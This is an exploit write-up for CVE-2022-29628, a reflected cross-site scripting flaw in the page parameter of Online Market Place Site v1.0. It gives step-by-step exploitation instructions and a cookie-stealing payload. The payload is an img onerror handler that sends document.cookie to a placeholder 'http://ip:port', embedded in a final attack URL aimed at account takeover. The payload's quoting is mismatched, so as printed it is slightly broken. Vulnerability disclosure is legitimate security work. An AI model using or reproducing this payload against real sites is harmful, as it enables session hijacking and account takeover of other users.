

CVE-2022-29628: OpenSource/ at main · nsparker1337/OpenSource

A cross-site scripting (XSS) vulnerability in /omps/seller of Online Market Place Site v1.0 allows attackers to execute arbitrary web cripts or HTML via a crafted payload injected into the Page parameter.


Exploit Title: Online Market Place Site v1.0 - XSS and CSRF****Date: April 17, 2022****Vendor Homepage:****Software Link:****Tested on: Parrot Linux, Apache, Mysql****Vendor: oretnom23****Version: v1.0****Exploit Description:****Online Market Place v1.0 suffers from Cross Site Scripting and Cross Site Request Forgery Vulnerability that allowing attackers to steal the cookies of other users(possible account takeover).

---------------------------------------- To Exploit ---------------------------------------------------------

Step 1: Register and login as a seller.

Step 2: Goto product page click action and select view product, you can see url like http://localhost/omps/seller/?page=products/view_details&id=4

Step 3: The page parameter is the vulnerable to cross site scripting because it’s not sanitizing the user input.

step 4: put the payload and you will see the pop window that reflects 1337.

step 5: Now attacker can send malicious url to other user then perfom csrf and finally takeover their account.

For stealing the cookies : <img src=’x’ onerror=this.src=http://ip:port/?’+document.cookie;>

Final Payload : http://localhost/omps/seller/?page=<img src=’x’ onerror=this.src=http://ip:port/?’+document.cookie;>&id=4

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